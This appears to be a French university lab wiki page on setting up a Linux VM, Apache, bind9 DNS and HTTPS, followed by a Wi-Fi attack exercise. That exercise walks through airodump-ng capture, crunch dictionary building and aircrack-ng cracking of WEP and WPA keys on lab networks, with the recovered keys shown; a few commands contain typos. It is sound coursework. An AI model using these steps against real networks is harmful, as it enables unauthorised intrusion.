Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
